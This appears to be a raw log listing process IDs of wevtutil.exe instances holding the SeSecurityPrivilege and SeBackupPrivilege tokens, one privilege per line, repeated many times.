Token: SeBackupPrivilege	1564	wevtutil.exe
Token: SeSecurityPrivilege	1400	wevtutil.exe
Token: SeBackupPrivilege	1400	wevtutil.exe
Token: SeSecurityPrivilege	1944	wevtutil.exe
Token: SeBackupPrivilege	1944	wevtutil.exe
Token: SeSecurityPrivilege	1960	wevtutil.exe
Token: SeBackupPrivilege	1960	wevtutil.exe
Token: SeSecurityPrivilege	1968	wevtutil.exe
Token: SeBackupPrivilege	1968	wevtutil.exe
Token: SeSecurityPrivilege	1136	wevtutil.exe
Token: SeBackupPrivilege	1136	wevtutil.exe
Token: SeSecurityPrivilege	1088	wevtutil.exe
Token: SeBackupPrivilege	1088	wevtutil.exe
Token: SeSecurityPrivilege	1972	wevtutil.exe
Token: SeBackupPrivilege	1972	wevtutil.exe
Token: SeSecurityPrivilege	1788	wevtutil.exe
Token: SeBackupPrivilege	1788	wevtutil.exe
Token: SeSecurityPrivilege	1988	wevtutil.exe
Token: SeBackupPrivilege	1988	wevtutil.exe
Token: SeSecurityPrivilege	2004	wevtutil.exe
Token: SeBackupPrivilege	2004	wevtutil.exe
Token: SeSecurityPrivilege	1220	wevtutil.exe
Token: SeBackupPrivilege	1220	wevtutil.exe
Token: SeSecurityPrivilege	1060	wevtutil.exe
Token: SeBackupPrivilege	1060	wevtutil.exe
Token: SeSecurityPrivilege	1840	wevtutil.exe
Token: SeBackupPrivilege	1840	wevtutil.exe
Token: SeSecurityPrivilege	624	wevtutil.exe
Token: SeBackupPrivilege	624	wevtutil.exe
Token: SeSecurityPrivilege	1040	wevtutil.exe
Token: SeBackupPrivilege	1040	wevtutil.exe
Token: SeSecurityPrivilege	1688	wevtutil.exe
Token: SeBackupPrivilege	1688	wevtutil.exe
Token: SeSecurityPrivilege	328	wevtutil.exe
Token: SeBackupPrivilege	328	wevtutil.exe
Token: SeSecurityPrivilege	2032	wevtutil.exe
Token: SeBackupPrivilege	2032	wevtutil.exe
Token: SeSecurityPrivilege	1152	wevtutil.exe
Token: SeBackupPrivilege	1152	wevtutil.exe
Token: SeSecurityPrivilege	1880	wevtutil.exe
Token: SeBackupPrivilege	1880	wevtutil.exe
Token: SeSecurityPrivilege	972	wevtutil.exe
Token: SeBackupPrivilege	972	wevtutil.exe
Token: SeSecurityPrivilege	1272	wevtutil.exe
Token: SeBackupPrivilege	1272	wevtutil.exe
Token: SeSecurityPrivilege	1076	wevtutil.exe
Token: SeBackupPrivilege	1076	wevtutil.exe
Token: SeSecurityPrivilege	1232	wevtutil.exe
Token: SeBackupPrivilege	1232	wevtutil.exe
Token: SeSecurityPrivilege	316	wevtutil.exe
Token: SeBackupPrivilege	316	wevtutil.exe
Token: SeSecurityPrivilege	1608	wevtutil.exe
Token: SeBackupPrivilege	1608	wevtutil.exe
Token: SeSecurityPrivilege	2044	wevtutil.exe
Token: SeBackupPrivilege	2044	wevtutil.exe
Token: SeSecurityPrivilege	1512	wevtutil.exe
Token: SeBackupPrivilege	1512	wevtutil.exe
Token: SeSecurityPrivilege	1564	wevtutil.exe
Token: SeBackupPrivilege	1564	wevtutil.exe
Token: SeSecurityPrivilege	1400	wevtutil.exe
Token: SeBackupPrivilege	1400	wevtutil.exe
Token: SeSecurityPrivilege	1944	wevtutil.exe
Token: SeBackupPrivilege	1944	wevtutil.exe
Token: SeSecurityPrivilege	1960	wevtutil.exe
Token: SeBackupPrivilege	1960	wevtutil.exe
Token: SeSecurityPrivilege	1968	wevtutil.exe
Token: SeBackupPrivilege	1968	wevtutil.exe
Token: SeSecurityPrivilege	1136	wevtutil.exe
Token: SeBackupPrivilege	1136	wevtutil.exe
Token: SeSecurityPrivilege	1088	wevtutil.exe
Token: SeBackupPrivilege	1088	wevtutil.exe
Token: SeSecurityPrivilege	1972	wevtutil.exe
Token: SeBackupPrivilege	1972	wevtutil.exe
Token: SeSecurityPrivilege	1788	wevtutil.exe
Token: SeBackupPrivilege	1788	wevtutil.exe
Token: SeSecurityPrivilege	1988	wevtutil.exe
Token: SeBackupPrivilege	1988	wevtutil.exe
Token: SeSecurityPrivilege	2004	wevtutil.exe
Token: SeBackupPrivilege	2004	wevtutil.exe
Token: SeSecurityPrivilege	1220	wevtutil.exe
Token: SeBackupPrivilege	1220	wevtutil.exe
Token: SeSecurityPrivilege	1060	wevtutil.exe
Token: SeBackupPrivilege	1060	wevtutil.exe
Token: SeSecurityPrivilege	1840	wevtutil.exe
Token: SeBackupPrivilege	1840	wevtutil.exe
Token: SeSecurityPrivilege	624	wevtutil.exe
Token: SeBackupPrivilege	624	wevtutil.exe
Token: SeSecurityPrivilege	1040	wevtutil.exe
Token: SeBackupPrivilege	1040	wevtutil.exe
Token: SeSecurityPrivilege	1688	wevtutil.exe
Token: SeBackupPrivilege	1688	wevtutil.exe
Token: SeSecurityPrivilege	328	wevtutil.exe
Token: SeBackupPrivilege	328	wevtutil.exe
Token: SeSecurityPrivilege	2032	wevtutil.exe
Token: SeBackupPrivilege	2032	wevtutil.exe
Token: SeSecurityPrivilege	1152	wevtutil.exe
Token: SeBackupPrivilege	1152	wevtutil.exe
Token: SeSecurityPrivilege	1880	wevtutil.exe
Token: SeBackupPrivilege	1880	wevtutil.exe
Token: SeSecurityPrivilege	972	wevtutil.exe
Token: SeBackupPrivilege	972	wevtutil.exe
Token: SeSecurityPrivilege	1272	wevtutil.exe
Token: SeBackupPrivilege	1272	wevtutil.exe
Token: SeSecurityPrivilege	1076	wevtutil.exe
Token: SeBackupPrivilege	1076	wevtutil.exe
Token: SeSecurityPrivilege	1232	wevtutil.exe
Token: SeBackupPrivilege	1232	wevtutil.exe
Token: SeSecurityPrivilege	316	wevtutil.exe
Token: SeBackupPrivilege	316	wevtutil.exe
Token: SeSecurityPrivilege	1608	wevtutil.exe
Token: SeBackupPrivilege	1608	wevtutil.exe
Token: SeSecurityPrivilege	2044	wevtutil.exe
Token: SeBackupPrivilege	2044	wevtutil.exe
Token: SeSecurityPrivilege	1512	wevtutil.exe
Token: SeBackupPrivilege	1512	wevtutil.exe
Token: SeSecurityPrivilege	1564	wevtutil.exe
Token: SeBackupPrivilege	1564	wevtutil.exe
Token: SeSecurityPrivilege	1400	wevtutil.exe
Token: SeBackupPrivilege	1400	wevtutil.exe
Token: SeSecurityPrivilege	1944	wevtutil.exe
Token: SeBackupPrivilege	1944	wevtutil.exe
Token: SeSecurityPrivilege	1960	wevtutil.exe
Token: SeBackupPrivilege	1960	wevtutil.exe
Token: SeSecurityPrivilege	1968	wevtutil.exe
Token: SeBackupPrivilege	1968	wevtutil.exe
Token: SeSecurityPrivilege	1136	wevtutil.exe
Token: SeBackupPrivilege	1136	wevtutil.exe
Token: SeSecurityPrivilege	1088	wevtutil.exe
Token: SeBackupPrivilege	1088	wevtutil.exe
Token: SeSecurityPrivilege	1972	wevtutil.exe
Token: SeBackupPrivilege	1972	wevtutil.exe
Token: SeSecurityPrivilege	1788	wevtutil.exe
Token: SeBackupPrivilege	1788	wevtutil.exe
Token: SeSecurityPrivilege	1988	wevtutil.exe
Token: SeBackupPrivilege	1988	wevtutil.exe
Token: SeSecurityPrivilege	2004	wevtutil.exe
Token: SeBackupPrivilege	2004	wevtutil.exe
Token: SeSecurityPrivilege	388	wevtutil.exe
Token: SeBackupPrivilege	388	wevtutil.exe
Token: SeSecurityPrivilege	740	wevtutil.exe
Token: SeBackupPrivilege	740	wevtutil.exe
Token: SeSecurityPrivilege	1028	wevtutil.exe
Token: SeBackupPrivilege	1028	wevtutil.exe
Token: SeSecurityPrivilege	1340	wevtutil.exe
Token: SeBackupPrivilege	1340	wevtutil.exe
Token: SeSecurityPrivilege	1080	wevtutil.exe
Token: SeBackupPrivilege	1080	wevtutil.exe
Token: SeSecurityPrivilege	1872	wevtutil.exe
Token: SeBackupPrivilege	1872	wevtutil.exe
Token: SeSecurityPrivilege	300	wevtutil.exe
Token: SeBackupPrivilege	300	wevtutil.exe
Token: SeSecurityPrivilege	2036	wevtutil.exe
Token: SeBackupPrivilege	2036	wevtutil.exe
Token: SeSecurityPrivilege	1520	wevtutil.exe
Token: SeBackupPrivilege	1520	wevtutil.exe
Token: SeSecurityPrivilege	1560	wevtutil.exe
Token: SeBackupPrivilege	1560	wevtutil.exe
Token: SeSecurityPrivilege	1532	wevtutil.exe
Token: SeBackupPrivilege	1532	wevtutil.exe
Token: SeSecurityPrivilege	884	wevtutil.exe
Token: SeBackupPrivilege	884	wevtutil.exe
Token: SeSecurityPrivilege	1992	wevtutil.exe
Token: SeBackupPrivilege	1992	wevtutil.exe
Token: SeSecurityPrivilege	1996	wevtutil.exe
Token: SeBackupPrivilege	1996	wevtutil.exe
Token: SeSecurityPrivilege	1112	wevtutil.exe
Token: SeBackupPrivilege	1112	wevtutil.exe
Token: SeSecurityPrivilege	1168	wevtutil.exe
Token: SeBackupPrivilege	1168	wevtutil.exe
Token: SeSecurityPrivilege	1964	wevtutil.exe
Token: SeBackupPrivilege	1964	wevtutil.exe
Token: SeSecurityPrivilege	288	wevtutil.exe
Token: SeBackupPrivilege	288	wevtutil.exe
Token: SeSecurityPrivilege	864	wevtutil.exe
Token: SeBackupPrivilege	864	wevtutil.exe
Token: SeSecurityPrivilege	1812	wevtutil.exe
Token: SeBackupPrivilege	1812	wevtutil.exe
Token: SeSecurityPrivilege	1792	wevtutil.exe
Token: SeBackupPrivilege	1792	wevtutil.exe
Token: SeSecurityPrivilege	1644	wevtutil.exe
Token: SeBackupPrivilege	1644	wevtutil.exe
Token: SeSecurityPrivilege	1876	wevtutil.exe
Token: SeBackupPrivilege	1876	wevtutil.exe
Token: SeSecurityPrivilege	1820	wevtutil.exe
Token: SeBackupPrivilege	1820	wevtutil.exe
Token: SeSecurityPrivilege	600	wevtutil.exe
Token: SeBackupPrivilege	600	wevtutil.exe
Token: SeSecurityPrivilege	1200	wevtutil.exe
Token: SeBackupPrivilege	1200	wevtutil.exe
Token: SeSecurityPrivilege	1788	wevtutil.exe
Token: SeBackupPrivilege	1788	wevtutil.exe
Token: SeSecurityPrivilege	1408	wevtutil.exe
Token: SeBackupPrivilege	1408	wevtutil.exe
Token: SeSecurityPrivilege	564	wevtutil.exe
Token: SeBackupPrivilege	564	wevtutil.exe
Token: SeSecurityPrivilege	1060	wevtutil.exe
Token: SeBackupPrivilege	1060	wevtutil.exe
Token: SeSecurityPrivilege	1840	wevtutil.exe
Token: SeBackupPrivilege	1840	wevtutil.exe
Token: SeSecurityPrivilege	624	wevtutil.exe
Token: SeBackupPrivilege	624	wevtutil.exe
Token: SeSecurityPrivilege	1040	wevtutil.exe
Token: SeBackupPrivilege	1040	wevtutil.exe
Token: SeSecurityPrivilege	1688	wevtutil.exe
Token: SeBackupPrivilege	1688	wevtutil.exe
Token: SeSecurityPrivilege	328	wevtutil.exe
Token: SeBackupPrivilege	328	wevtutil.exe
Token: SeSecurityPrivilege	2032	wevtutil.exe
Token: SeBackupPrivilege	2032	wevtutil.exe
Token: SeSecurityPrivilege	1152	wevtutil.exe
Token: SeBackupPrivilege	1152	wevtutil.exe
Token: SeSecurityPrivilege	1880	wevtutil.exe
Token: SeBackupPrivilege	1880	wevtutil.exe
Token: SeSecurityPrivilege	972	wevtutil.exe
Token: SeBackupPrivilege	972	wevtutil.exe
Token: SeSecurityPrivilege	1272	wevtutil.exe
Token: SeBackupPrivilege	1272	wevtutil.exe
Token: SeSecurityPrivilege	1076	wevtutil.exe
Token: SeBackupPrivilege	1076	wevtutil.exe
Token: SeSecurityPrivilege	1232	wevtutil.exe
Token: SeBackupPrivilege	1232	wevtutil.exe
Token: SeSecurityPrivilege	316	wevtutil.exe
Token: SeBackupPrivilege	316	wevtutil.exe
Token: SeSecurityPrivilege	1608	wevtutil.exe
Token: SeBackupPrivilege	1608	wevtutil.exe
Token: SeSecurityPrivilege	2044	wevtutil.exe
Token: SeBackupPrivilege	2044	wevtutil.exe
Token: SeSecurityPrivilege	1512	wevtutil.exe
Token: SeBackupPrivilege	1512	wevtutil.exe
Token: SeSecurityPrivilege	1564	wevtutil.exe
Token: SeBackupPrivilege	1564	wevtutil.exe
Token: SeSecurityPrivilege	1400	wevtutil.exe
Token: SeBackupPrivilege	1400	wevtutil.exe
Token: SeSecurityPrivilege	1944	wevtutil.exe
Token: SeBackupPrivilege	1944	wevtutil.exe
Token: SeSecurityPrivilege	1960	wevtutil.exe
Token: SeBackupPrivilege	1960	wevtutil.exe
Token: SeSecurityPrivilege	1968	wevtutil.exe
Token: SeBackupPrivilege	1968	wevtutil.exe
Token: SeSecurityPrivilege	1136	wevtutil.exe
Token: SeBackupPrivilege	1136	wevtutil.exe
Token: SeSecurityPrivilege	1088	wevtutil.exe
Token: SeBackupPrivilege	1088	wevtutil.exe
Token: SeSecurityPrivilege	1972	wevtutil.exe
Token: SeBackupPrivilege	1972	wevtutil.exe
Token: SeSecurityPrivilege	688	wevtutil.exe
Token: SeBackupPrivilege	688	wevtutil.exe
Token: SeSecurityPrivilege	920	wevtutil.exe
Token: SeBackupPrivilege	920	wevtutil.exe
Token: SeSecurityPrivilege	1468	wevtutil.exe
Token: SeBackupPrivilege	1468	wevtutil.exe
Token: SeSecurityPrivilege	1212	wevtutil.exe
Token: SeBackupPrivilege	1212	wevtutil.exe
Token: SeSecurityPrivilege	1656	wevtutil.exe
Token: SeBackupPrivilege	1656	wevtutil.exe
Token: SeSecurityPrivilege	1176	wevtutil.exe
Token: SeBackupPrivilege	1176	wevtutil.exe
Token: SeSecurityPrivilege	1356	wevtutil.exe
Token: SeBackupPrivilege	1356	wevtutil.exe
Token: SeSecurityPrivilege	1032	wevtutil.exe
Token: SeBackupPrivilege	1032	wevtutil.exe
Token: SeSecurityPrivilege	660	wevtutil.exe
Token: SeBackupPrivilege	660	wevtutil.exe
Token: SeSecurityPrivilege	1484	wevtutil.exe
Token: SeBackupPrivilege	1484	wevtutil.exe
Token: SeSecurityPrivilege	2012	wevtutil.exe
Token: SeBackupPrivilege	2012	wevtutil.exe
Token: SeSecurityPrivilege	1524	wevtutil.exe
Token: SeBackupPrivilege	1524	wevtutil.exe
Token: SeSecurityPrivilege	1472	wevtutil.exe
Token: SeBackupPrivilege	1472	wevtutil.exe
Token: SeSecurityPrivilege	1528	wevtutil.exe
Token: SeBackupPrivilege	1528	wevtutil.exe
Token: SeSecurityPrivilege	1828	wevtutil.exe
Token: SeBackupPrivilege	1828	wevtutil.exe
Token: SeSecurityPrivilege	1804	wevtutil.exe
Token: SeBackupPrivilege	1804	wevtutil.exe
Token: SeSecurityPrivilege	1996	wevtutil.exe
Token: SeBackupPrivilege	1996	wevtutil.exe
Token: SeSecurityPrivilege	1112	wevtutil.exe
Token: SeBackupPrivilege	1112	wevtutil.exe
Token: SeSecurityPrivilege	1168	wevtutil.exe
Token: SeBackupPrivilege	1168	wevtutil.exe
Token: SeSecurityPrivilege	1964	wevtutil.exe
Token: SeBackupPrivilege	1964	wevtutil.exe
Token: SeSecurityPrivilege	288	wevtutil.exe
Token: SeBackupPrivilege	288	wevtutil.exe
Token: SeSecurityPrivilege	864	wevtutil.exe
Token: SeBackupPrivilege	864	wevtutil.exe
Token: SeSecurityPrivilege	1812	wevtutil.exe
Token: SeBackupPrivilege	1812	wevtutil.exe
Token: SeSecurityPrivilege	1552	wevtutil.exe
Token: SeBackupPrivilege	1552	wevtutil.exe
Token: SeSecurityPrivilege	1960	wevtutil.exe
Token: SeBackupPrivilege	1960	wevtutil.exe
Token: SeSecurityPrivilege	1968	wevtutil.exe
Token: SeBackupPrivilege	1968	wevtutil.exe
Token: SeSecurityPrivilege	1136	wevtutil.exe
Token: SeBackupPrivilege	1136	wevtutil.exe
Token: SeSecurityPrivilege	1088	wevtutil.exe
Token: SeBackupPrivilege	1088	wevtutil.exe
Token: SeSecurityPrivilege	1972	wevtutil.exe
Token: SeBackupPrivilege	1972	wevtutil.exe
Token: SeSecurityPrivilege	688	wevtutil.exe
Token: SeBackupPrivilege	688	wevtutil.exe
Token: SeSecurityPrivilege	920	wevtutil.exe
Token: SeBackupPrivilege	920	wevtutil.exe
Token: SeSecurityPrivilege	1468	wevtutil.exe
Token: SeBackupPrivilege	1468	wevtutil.exe
Token: SeSecurityPrivilege	1212	wevtutil.exe
Token: SeBackupPrivilege	1212	wevtutil.exe
Token: SeSecurityPrivilege	1656	wevtutil.exe
Token: SeBackupPrivilege	1656	wevtutil.exe
Token: SeSecurityPrivilege	1176	wevtutil.exe
Token: SeBackupPrivilege	1176	wevtutil.exe
Token: SeSecurityPrivilege	1356	wevtutil.exe
Token: SeBackupPrivilege	1356	wevtutil.exe
Token: SeSecurityPrivilege	1032	wevtutil.exe
Token: SeBackupPrivilege	1032	wevtutil.exe
Token: SeSecurityPrivilege	660	wevtutil.exe
Token: SeBackupPrivilege	660	wevtutil.exe
Token: SeSecurityPrivilege	1484	wevtutil.exe
Token: SeBackupPrivilege	1484	wevtutil.exe
Token: SeSecurityPrivilege	2012	wevtutil.exe
Token: SeBackupPrivilege	2012	wevtutil.exe
Token: SeSecurityPrivilege	1524	wevtutil.exe
Token: SeBackupPrivilege	1524	wevtutil.exe
Token: SeSecurityPrivilege	1472	wevtutil.exe
Token: SeBackupPrivilege	1472	wevtutil.exe
Token: SeSecurityPrivilege	1528	wevtutil.exe
Token: SeBackupPrivilege	1528	wevtutil.exe
Token: SeSecurityPrivilege	1828	wevtutil.exe
Token: SeBackupPrivilege	1828	wevtutil.exe
Token: SeSecurityPrivilege	1992	wevtutil.exe
Token: SeBackupPrivilege	1992	wevtutil.exe
Token: SeSecurityPrivilege	1516	wevtutil.exe
Token: SeBackupPrivilege	1516	wevtutil.exe
Token: SeSecurityPrivilege	1796	wevtutil.exe
Token: SeBackupPrivilege	1796	wevtutil.exe
Token: SeSecurityPrivilege	1956	wevtutil.exe
Token: SeBackupPrivilege	1956	wevtutil.exe
Token: SeSecurityPrivilege	1256	wevtutil.exe
Token: SeBackupPrivilege	1256	wevtutil.exe
Token: SeSecurityPrivilege	2020	wevtutil.exe
Token: SeBackupPrivilege	2020	wevtutil.exe
Token: SeSecurityPrivilege	240	wevtutil.exe
Token: SeBackupPrivilege	240	wevtutil.exe
Token: SeSecurityPrivilege	736	wevtutil.exe
Token: SeBackupPrivilege	736	wevtutil.exe
Token: SeSecurityPrivilege	1824	wevtutil.exe
Token: SeBackupPrivilege	1824	wevtutil.exe
Token: SeSecurityPrivilege	1976	wevtutil.exe
Token: SeBackupPrivilege	1976	wevtutil.exe
Token: SeSecurityPrivilege	1552	wevtutil.exe
Token: SeBackupPrivilege	1552	wevtutil.exe
Token: SeSecurityPrivilege	1960	wevtutil.exe
Token: SeBackupPrivilege	1960	wevtutil.exe
Token: SeSecurityPrivilege	1968	wevtutil.exe
Token: SeBackupPrivilege	1968	wevtutil.exe
Token: SeSecurityPrivilege	1136	wevtutil.exe
Token: SeBackupPrivilege	1136	wevtutil.exe
Token: SeSecurityPrivilege	1088	wevtutil.exe
Token: SeBackupPrivilege	1088	wevtutil.exe
Token: SeSecurityPrivilege	1972	wevtutil.exe
Token: SeBackupPrivilege	1972	wevtutil.exe
Token: SeSecurityPrivilege	688	wevtutil.exe
Token: SeBackupPrivilege	688	wevtutil.exe
Token: SeSecurityPrivilege	920	wevtutil.exe
Token: SeBackupPrivilege	920	wevtutil.exe
Token: SeSecurityPrivilege	1468	wevtutil.exe
Token: SeBackupPrivilege	1468	wevtutil.exe
Token: SeSecurityPrivilege	1212	wevtutil.exe
Token: SeBackupPrivilege	1212	wevtutil.exe
Token: SeSecurityPrivilege	1656	wevtutil.exe
Token: SeBackupPrivilege	1656	wevtutil.exe
Token: SeSecurityPrivilege	1176	wevtutil.exe
Token: SeBackupPrivilege	1176	wevtutil.exe
Token: SeSecurityPrivilege	1356	wevtutil.exe
Token: SeBackupPrivilege	1356	wevtutil.exe
Token: SeSecurityPrivilege	1032	wevtutil.exe
Token: SeBackupPrivilege	1032	wevtutil.exe
Token: SeSecurityPrivilege	660	wevtutil.exe
Token: SeBackupPrivilege	660	wevtutil.exe
Token: SeSecurityPrivilege	1484	wevtutil.exe
Token: SeBackupPrivilege	1484	wevtutil.exe
Token: SeSecurityPrivilege	2012	wevtutil.exe
Token: SeBackupPrivilege	2012	wevtutil.exe
Token: SeSecurityPrivilege	1524	wevtutil.exe
Token: SeBackupPrivilege	1524	wevtutil.exe
Token: SeSecurityPrivilege	1472	wevtutil.exe
Token: SeBackupPrivilege	1472	wevtutil.exe
Token: SeSecurityPrivilege	1528	wevtutil.exe
Token: SeBackupPrivilege	1528	wevtutil.exe
Token: SeSecurityPrivilege	1828	wevtutil.exe
Token: SeBackupPrivilege	1828	wevtutil.exe
Token: SeSecurityPrivilege	1992	wevtutil.exe
Token: SeBackupPrivilege	1992	wevtutil.exe
Token: SeSecurityPrivilege	1516	wevtutil.exe
Token: SeBackupPrivilege	1516	wevtutil.exe
Token: SeSecurityPrivilege	1796	wevtutil.exe
Token: SeBackupPrivilege	1796	wevtutil.exe
Token: SeSecurityPrivilege	1956	wevtutil.exe
Token: SeBackupPrivilege	1956	wevtutil.exe
Token: SeSecurityPrivilege	1256	wevtutil.exe
Token: SeBackupPrivilege	1256	wevtutil.exe
Token: SeSecurityPrivilege	2020	wevtutil.exe
Token: SeBackupPrivilege	2020	wevtutil.exe
Token: SeSecurityPrivilege	240	wevtutil.exe
Token: SeBackupPrivilege	240	wevtutil.exe
Token: SeSecurityPrivilege	736	wevtutil.exe
Token: SeBackupPrivilege	736	wevtutil.exe
Token: SeSecurityPrivilege	1824	wevtutil.exe
Token: SeBackupPrivilege	1824	wevtutil.exe
Token: SeSecurityPrivilege	1976	wevtutil.exe
Token: SeBackupPrivilege	1976	wevtutil.exe
Token: SeSecurityPrivilege	1552	wevtutil.exe
Token: SeBackupPrivilege	1552	wevtutil.exe
Token: SeSecurityPrivilege	1960	wevtutil.exe
Token: SeBackupPrivilege	1960	wevtutil.exe
Token: SeSecurityPrivilege	1968	wevtutil.exe
Token: SeBackupPrivilege	1968	wevtutil.exe
Token: SeSecurityPrivilege	1136	wevtutil.exe
Token: SeBackupPrivilege	1136	wevtutil.exe
Token: SeSecurityPrivilege	1088	wevtutil.exe
Token: SeBackupPrivilege	1088	wevtutil.exe
Token: SeSecurityPrivilege	1972	wevtutil.exe
Token: SeBackupPrivilege	1972	wevtutil.exe
Token: SeSecurityPrivilege	688	wevtutil.exe
Token: SeBackupPrivilege	688	wevtutil.exe
Token: SeSecurityPrivilege	920	wevtutil.exe
Token: SeBackupPrivilege	920	wevtutil.exe
Token: SeSecurityPrivilege	1468	wevtutil.exe
Token: SeBackupPrivilege	1468	wevtutil.exe
Token: SeSecurityPrivilege	1212	wevtutil.exe
Token: SeBackupPrivilege	1212	wevtutil.exe
Token: SeSecurityPrivilege	1656	wevtutil.exe
Token: SeBackupPrivilege	1656	wevtutil.exe
Token: SeSecurityPrivilege	1176	wevtutil.exe
Token: SeBackupPrivilege	1176	wevtutil.exe
Token: SeSecurityPrivilege	1356	wevtutil.exe
Token: SeBackupPrivilege	1356	wevtutil.exe
Token: SeSecurityPrivilege	1032	wevtutil.exe
Token: SeBackupPrivilege	1032	wevtutil.exe
Token: SeSecurityPrivilege	660	wevtutil.exe
Token: SeBackupPrivilege	660	wevtutil.exe
Token: SeSecurityPrivilege	1484	wevtutil.exe
Token: SeBackupPrivilege	1484	wevtutil.exe
Token: SeSecurityPrivilege	2012	wevtutil.exe
Token: SeBackupPrivilege	2012	wevtutil.exe
Token: SeSecurityPrivilege	1524	wevtutil.exe
Token: SeBackupPrivilege	1524	wevtutil.exe
Token: SeSecurityPrivilege	1472	wevtutil.exe
Token: SeBackupPrivilege	1472	wevtutil.exe
Token: SeSecurityPrivilege	1528	wevtutil.exe
Token: SeBackupPrivilege	1528	wevtutil.exe
Token: SeSecurityPrivilege	1828	wevtutil.exe
Token: SeBackupPrivilege	1828	wevtutil.exe
Token: SeSecurityPrivilege	1992	wevtutil.exe
Token: SeBackupPrivilege	1992	wevtutil.exe
Token: SeSecurityPrivilege	1516	wevtutil.exe
Token: SeBackupPrivilege	1516	wevtutil.exe
Token: SeSecurityPrivilege	1796	wevtutil.exe
Token: SeBackupPrivilege	1796	wevtutil.exe
Token: SeSecurityPrivilege	1956	wevtutil.exe
Token: SeBackupPrivilege	1956	wevtutil.exe
Token: SeSecurityPrivilege	1256	wevtutil.exe
Token: SeBackupPrivilege	1256	wevtutil.exe
Token: SeSecurityPrivilege	2020	wevtutil.exe
Token: SeBackupPrivilege	2020	wevtutil.exe
Token: SeSecurityPrivilege	240	wevtutil.exe
Token: SeBackupPrivilege	240	wevtutil.exe
Token: SeSecurityPrivilege	736	wevtutil.exe
Token: SeBackupPrivilege	736	wevtutil.exe
Token: SeSecurityPrivilege	1824	wevtutil.exe
Token: SeBackupPrivilege	1824	wevtutil.exe
Token: SeSecurityPrivilege	1976	wevtutil.exe
Token: SeBackupPrivilege	1976	wevtutil.exe
Token: SeSecurityPrivilege	1552	wevtutil.exe
Token: SeBackupPrivilege	1552	wevtutil.exe
Token: SeSecurityPrivilege	1960	wevtutil.exe
Token: SeBackupPrivilege	1960	wevtutil.exe
Token: SeSecurityPrivilege	1968	wevtutil.exe
Token: SeBackupPrivilege	1968	wevtutil.exe
Token: SeSecurityPrivilege	1136	wevtutil.exe
Token: SeBackupPrivilege	1136	wevtutil.exe
Token: SeSecurityPrivilege	1088	wevtutil.exe
Token: SeBackupPrivilege	1088	wevtutil.exe
Token: SeSecurityPrivilege	1972	wevtutil.exe
Token: SeBackupPrivilege	1972	wevtutil.exe
Token: SeSecurityPrivilege	688	wevtutil.exe
Token: SeBackupPrivilege	688	wevtutil.exe
Token: SeSecurityPrivilege	920	wevtutil.exe
Token: SeBackupPrivilege	920	wevtutil.exe
Token: SeSecurityPrivilege	1468	wevtutil.exe
Token: SeBackupPrivilege	1468	wevtutil.exe
Token: SeSecurityPrivilege	1212	wevtutil.exe
Token: SeBackupPrivilege	1212	wevtutil.exe
Token: SeSecurityPrivilege	1656	wevtutil.exe
Token: SeBackupPrivilege	1656	wevtutil.exe
Token: SeSecurityPrivilege	1176	wevtutil.exe
Token: SeBackupPrivilege	1176	wevtutil.exe
Token: SeSecurityPrivilege	1356	wevtutil.exe
Token: SeBackupPrivilege	1356	wevtutil.exe
Token: SeSecurityPrivilege	1032	wevtutil.exe
Token: SeBackupPrivilege	1032	wevtutil.exe
Token: SeSecurityPrivilege	660	wevtutil.exe
Token: SeBackupPrivilege	660	wevtutil.exe
Token: SeSecurityPrivilege	1484	wevtutil.exe
Token: SeBackupPrivilege	1484	wevtutil.exe
Token: SeSecurityPrivilege	2012	wevtutil.exe
Token: SeBackupPrivilege	2012	wevtutil.exe
Token: SeSecurityPrivilege	1524	wevtutil.exe
Token: SeBackupPrivilege	1524	wevtutil.exe
Token: SeSecurityPrivilege	1472	wevtutil.exe
Token: SeBackupPrivilege	1472	wevtutil.exe
Token: SeSecurityPrivilege	1528	wevtutil.exe
Token: SeBackupPrivilege	1528	wevtutil.exe
Token: SeSecurityPrivilege	1828	wevtutil.exe
Token: SeBackupPrivilege	1828	wevtutil.exe
Token: SeSecurityPrivilege	1992	wevtutil.exe
Token: SeBackupPrivilege	1992	wevtutil.exe
Token: SeSecurityPrivilege	1516	wevtutil.exe
Token: SeBackupPrivilege	1516	wevtutil.exe
Token: SeSecurityPrivilege	1796	wevtutil.exe
Token: SeBackupPrivilege	1796	wevtutil.exe
Token: SeSecurityPrivilege	1956	wevtutil.exe
Token: SeBackupPrivilege	1956	wevtutil.exe
Token: SeSecurityPrivilege	1256	wevtutil.exe
Token: SeBackupPrivilege	1256	wevtutil.exe
Token: SeSecurityPrivilege	2020	wevtutil.exe
Token: SeBackupPrivilege	2020	wevtutil.exe
Token: SeSecurityPrivilege	240	wevtutil.exe
Token: SeBackupPrivilege	240	wevtutil.exe
Token: SeSecurityPrivilege	736	wevtutil.exe
Token: SeBackupPrivilege	736	wevtutil.exe
Token: SeSecurityPrivilege	1824	wevtutil.exe
Token: SeBackupPrivilege	1824	wevtutil.exe
Token: SeSecurityPrivilege	1976	wevtutil.exe
Token: SeBackupPrivilege	1976	wevtutil.exe
Token: SeSecurityPrivilege	1552	wevtutil.exe
Token: SeBackupPrivilege	1552	wevtutil.exe
Token: SeSecurityPrivilege	1960	wevtutil.exe
Token: SeBackupPrivilege	1960	wevtutil.exe
Token: SeSecurityPrivilege	1968	wevtutil.exe
Token: SeBackupPrivilege	1968	wevtutil.exe
Token: SeSecurityPrivilege	1136	wevtutil.exe
Token: SeBackupPrivilege	1136	wevtutil.exe
Token: SeSecurityPrivilege	1088	wevtutil.exe
Token: SeBackupPrivilege	1088	wevtutil.exe
Token: SeSecurityPrivilege	1972	wevtutil.exe
Token: SeBackupPrivilege	1972	wevtutil.exe
Token: SeSecurityPrivilege	688	wevtutil.exe
Token: SeBackupPrivilege	688	wevtutil.exe
Token: SeSecurityPrivilege	920	wevtutil.exe
Token: SeBackupPrivilege	920	wevtutil.exe
Token: SeSecurityPrivilege	1468	wevtutil.exe
Token: SeBackupPrivilege	1468	wevtutil.exe
Token: SeSecurityPrivilege	1212	wevtutil.exe
Token: SeBackupPrivilege	1212	wevtutil.exe
Token: SeSecurityPrivilege	1656	wevtutil.exe
Token: SeBackupPrivilege	1656	wevtutil.exe
Token: SeSecurityPrivilege	1176	wevtutil.exe
Token: SeBackupPrivilege	1176	wevtutil.exe
Token: SeSecurityPrivilege	1356	wevtutil.exe
Token: SeBackupPrivilege	1356	wevtutil.exe
Token: SeSecurityPrivilege	1032	wevtutil.exe
Token: SeBackupPrivilege	1032	wevtutil.exe
Token: SeSecurityPrivilege	660	wevtutil.exe
Token: SeBackupPrivilege	660	wevtutil.exe
